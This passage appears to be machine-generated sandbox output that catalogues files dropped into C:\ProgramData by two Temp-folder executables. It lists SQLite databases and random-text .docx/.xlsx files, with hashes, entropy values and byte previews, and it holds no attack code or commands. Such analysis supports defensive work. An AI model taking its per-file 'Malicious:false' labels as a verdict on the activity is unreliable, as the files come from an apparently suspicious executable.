                                                                                                                                                                                                                                C:\ProgramData\AFHDHCAAKECFIDHIEBAKFCGCFC

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                Entropy (8bit):0.8501914549146043
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBOKq/hFKipNzF23ukuE1:ThFawNLopFgU10XJBODhFKMxk1
                                                                                                                                                                                                                                MD5:3BD8534EE37F707CEE75F67A6F27C5BD
                                                                                                                                                                                                                                SHA1:C02E6D9D228504D8C11FD7F24D26B367AB013D46
                                                                                                                                                                                                                                SHA-256:2AA70608BCC9634BD4C977584969B0FC26C5B612C3D9706290A1CDA5D55941CF
                                                                                                                                                                                                                                SHA-512:30828B32AD1D9D1A71A81686133123868B34C4BC67B8E321A7B3F5E875E3C836E5BE5B6B0C458349ED88F8ECC167AF4C29C7E678DF9822E2685850FF5F45E8DE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\AFWAAFRXKO.docx

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.6868290294905215
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
                                                                                                                                                                                                                                MD5:E655D05DEDA782A6FE1E44028236D3A4
                                                                                                                                                                                                                                SHA1:ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
                                                                                                                                                                                                                                SHA-256:69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
                                                                                                                                                                                                                                SHA-512:25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

                                                                                                                                                                                                                                C:\ProgramData\AIXACVYBSB.xlsx

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.690067217069288
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
                                                                                                                                                                                                                                MD5:4E32787C3D6F915D3CB360878174E142
                                                                                                                                                                                                                                SHA1:57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
                                                                                                                                                                                                                                SHA-256:2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
                                                                                                                                                                                                                                SHA-512:CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

                                                                                                                                                                                                                                C:\ProgramData\CAAEBFHJJDAAKFIECGDBKJDGIJ

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\DGCAAAFC

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                                                                                Entropy (8bit):1.1209935793793442
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
                                                                                                                                                                                                                                MD5:214CFA91B0A6939C4606C4F99C9183B3
                                                                                                                                                                                                                                SHA1:A36951EB26E00F95BFD44C0851827A032EAFD91A
                                                                                                                                                                                                                                SHA-256:660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
                                                                                                                                                                                                                                SHA-512:E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\DGCAAAFCBFBAKFHJDBKJ

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\DGDAEHCBGIIJJJJKKKEHDGHJKF

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5242880
                                                                                                                                                                                                                                Entropy (8bit):0.03779668081370459
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWZh1B++NbBl3D56+9H9HI:58r54w0VW3xWZhW+Ff3AW9
                                                                                                                                                                                                                                MD5:F5A3FAA39A2FDA10356E1889BC81EA55
                                                                                                                                                                                                                                SHA1:FD4D7CF58C33C8583E45D88A2F89B8F66770644B
                                                                                                                                                                                                                                SHA-256:55BDD67E95C3B441AE02D26939E484E14B14550F5A273F3E35ADE569ABA8FAF9
                                                                                                                                                                                                                                SHA-512:28766C6C4FCB65CF9B436ED51708FABF3E2D8F8B3344F80B64A93994EE170DBB25025DBDB164A22636C1354139215A8B4181AC35D9E98A9950E9C1ECF1473D7F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\GDHIIIIEHCFIECAKFHJDAFCBFC

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\GHCGDAFCFHIDBGDHCFCB

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):51200
                                                                                                                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\JJJDGIEC

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                Entropy (8bit):1.1366744760037832
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cZ/Q4:MnlyfnGtxnfVuSVumEHZY4
                                                                                                                                                                                                                                MD5:403AF73130A55F1DF5D5D597717A386C
                                                                                                                                                                                                                                SHA1:AA0262EE3F7188D59D5859AF240B725AA9252212
                                                                                                                                                                                                                                SHA-256:A225C7166B6841D04F34589DB373472CA34525F88A644B5903733563372642AD
                                                                                                                                                                                                                                SHA-512:B70388D614814369D8DB9E4F3F20FB2F16EED5A65893DC7A8872E8FC462A7338F929A0777B4D18B77E1F4A6864CDA790ABD91116C9D1483DFFB64173699EEAEF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\KKFHJDAEHIEHJJKFBGDAKKKKEG

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u69w.0.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                Entropy (8bit):0.8501914549146043
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBOKq/hFKipNzF23ukuE1:ThFawNLopFgU10XJBODhFKMxk1
                                                                                                                                                                                                                                MD5:3BD8534EE37F707CEE75F67A6F27C5BD
                                                                                                                                                                                                                                SHA1:C02E6D9D228504D8C11FD7F24D26B367AB013D46
                                                                                                                                                                                                                                SHA-256:2AA70608BCC9634BD4C977584969B0FC26C5B612C3D9706290A1CDA5D55941CF
                                                                                                                                                                                                                                SHA-512:30828B32AD1D9D1A71A81686133123868B34C4BC67B8E321A7B3F5E875E3C836E5BE5B6B0C458349ED88F8ECC167AF4C29C7E678DF9822E2685850FF5F45E8DE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\MNULNCRIYC.docx

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.704010251295094
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:/j/sfpWFBIirMexXYVw/K9dKAkzFeHx1x21g4kug4c7xy:/j/vBDZxXYVw/KXjHx/4kuUxy
                                                                                                                                                                                                                                MD5:DF05C5F93419C56BFE3A84BDCC929382
                                                                                                                                                                                                                                SHA1:36AABBCD46C0F368E18FA602E486816D2578F48E
                                                                                                                                                                                                                                SHA-256:F7116531006BD0A5DEE64436C66CE5487C662F72BFBCD235C7407FBF2A3278DE
                                                                                                                                                                                                                                SHA-512:EB50E34AA5EE92A7C90AA5BCE11F0693AFAC73C26B04AF9C676E15A24813C52EAF09A4EA3F6490223CABCDB3EB6277E74CB6FF288D3D1871F14B410E950656BA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MNULNCRIYCLQPFRTTBIRJXLLXDPOIGHIWSMRZAWOWMFPIGBQDOQPBHCVDNAEFVPPKLZOIKPKFYDTDOGMSIUWATNOJJJSNKBWJHKKWMUZDRGJJNWUASOTXKYYIZLCOHDOBJPMAPIXVROTWYIYRPFZWZLECCXJOFYKKMMQGDBCRRZBEIALJQWFBIRGZWKKZNILSZURIFNVYXWPHRMYGXATLINJURPYVWCXYNUAESGKBUAMJTBBSVQQAIZKUVJSGVILJMHXCRFQYYXESEYBSMBQEHOEREHZFHPFENYHMHULCMQJKSSZLDDCMPWESAOKZQCENLMVXZGUVHNVUKXEWENTAXUEHCWCADQIRNYDFQPSQSUSDTQUVKPDYTOYMXIFXIMYDOEFHNJDKHPJDUFNMBXUSNDPQKBSTIVTXYHJYKOGCJMZHQRQQDXTWGEMBAJZIDXHPCGJTNITUFATHMPLPFJLWOPXNLVVCCPOQFCWKUCSSMFUWUXSMBYFBMUPJSINHRBJCPPQTSNUWCSGVBNMGEVXSQAUHMBGCNHVBRKKXPGDWRHAWFZYIGXLNCPKSLAZERFWOQNQAXTGZOWNEPLIJOXTLEMUDNYMQCRGFNMOCSUXSKKUKSNFLMUYAVMFWVWOEHAYJWOLYNYYTGSCYSYAJVUNEZQYLOBOCROMKWXPJGQVMSTNKYJEQCUQCBVMAJBOALKJAPYUEVMIWWFMSPLPSKKZMKNEKPQGDNBVBYHNPDIQEEKXUZLGWXQGDQZEHBMYYFUDFGNLYGARBRCREXIQUUWFEXDYINDKFJACYETJBANLSCEYWEBIPFZEOGUWOHBPBFLDAELAEPFOIZRSYWISCBUYPUAHWUVAIRDXHGXUQNAEDFFRDSODQFGQLGCIHSIWHVUDCTSMIQTMXSFNUPKSLBDPGVPMZPHIEMSXUQSRIGGMHVDMGMPEPCJPZBENUEBMZNZVWTRCVAGRSYRBZLOAETCXTWCINHSWQQFCHATVQRGJ

                                                                                                                                                                                                                                C:\ProgramData\MNULNCRIYC.xlsx

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.704010251295094
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:/j/sfpWFBIirMexXYVw/K9dKAkzFeHx1x21g4kug4c7xy:/j/vBDZxXYVw/KXjHx/4kuUxy
                                                                                                                                                                                                                                MD5:DF05C5F93419C56BFE3A84BDCC929382
                                                                                                                                                                                                                                SHA1:36AABBCD46C0F368E18FA602E486816D2578F48E
                                                                                                                                                                                                                                SHA-256:F7116531006BD0A5DEE64436C66CE5487C662F72BFBCD235C7407FBF2A3278DE
                                                                                                                                                                                                                                SHA-512:EB50E34AA5EE92A7C90AA5BCE11F0693AFAC73C26B04AF9C676E15A24813C52EAF09A4EA3F6490223CABCDB3EB6277E74CB6FF288D3D1871F14B410E950656BA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MNULNCRIYCLQPFRTTBIRJXLLXDPOIGHIWSMRZAWOWMFPIGBQDOQPBHCVDNAEFVPPKLZOIKPKFYDTDOGMSIUWATNOJJJSNKBWJHKKWMUZDRGJJNWUASOTXKYYIZLCOHDOBJPMAPIXVROTWYIYRPFZWZLECCXJOFYKKMMQGDBCRRZBEIALJQWFBIRGZWKKZNILSZURIFNVYXWPHRMYGXATLINJURPYVWCXYNUAESGKBUAMJTBBSVQQAIZKUVJSGVILJMHXCRFQYYXESEYBSMBQEHOEREHZFHPFENYHMHULCMQJKSSZLDDCMPWESAOKZQCENLMVXZGUVHNVUKXEWENTAXUEHCWCADQIRNYDFQPSQSUSDTQUVKPDYTOYMXIFXIMYDOEFHNJDKHPJDUFNMBXUSNDPQKBSTIVTXYHJYKOGCJMZHQRQQDXTWGEMBAJZIDXHPCGJTNITUFATHMPLPFJLWOPXNLVVCCPOQFCWKUCSSMFUWUXSMBYFBMUPJSINHRBJCPPQTSNUWCSGVBNMGEVXSQAUHMBGCNHVBRKKXPGDWRHAWFZYIGXLNCPKSLAZERFWOQNQAXTGZOWNEPLIJOXTLEMUDNYMQCRGFNMOCSUXSKKUKSNFLMUYAVMFWVWOEHAYJWOLYNYYTGSCYSYAJVUNEZQYLOBOCROMKWXPJGQVMSTNKYJEQCUQCBVMAJBOALKJAPYUEVMIWWFMSPLPSKKZMKNEKPQGDNBVBYHNPDIQEEKXUZLGWXQGDQZEHBMYYFUDFGNLYGARBRCREXIQUUWFEXDYINDKFJACYETJBANLSCEYWEBIPFZEOGUWOHBPBFLDAELAEPFOIZRSYWISCBUYPUAHWUVAIRDXHGXUQNAEDFFRDSODQFGQLGCIHSIWHVUDCTSMIQTMXSFNUPKSLBDPGVPMZPHIEMSXUQSRIGGMHVDMGMPEPCJPZBENUEBMZNZVWTRCVAGRSYRBZLOAETCXTWCINHSWQQFCHATVQRGJ

                                                                                                                                                                                                                                C:\ProgramData\NEBFQQYWPS.xlsx

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.692704155467908
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
                                                                                                                                                                                                                                MD5:D0B81B6D51E4EDDB3769BCE2A5F1538F
                                                                                                                                                                                                                                SHA1:08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
                                                                                                                                                                                                                                SHA-256:18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
                                                                                                                                                                                                                                SHA-512:CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
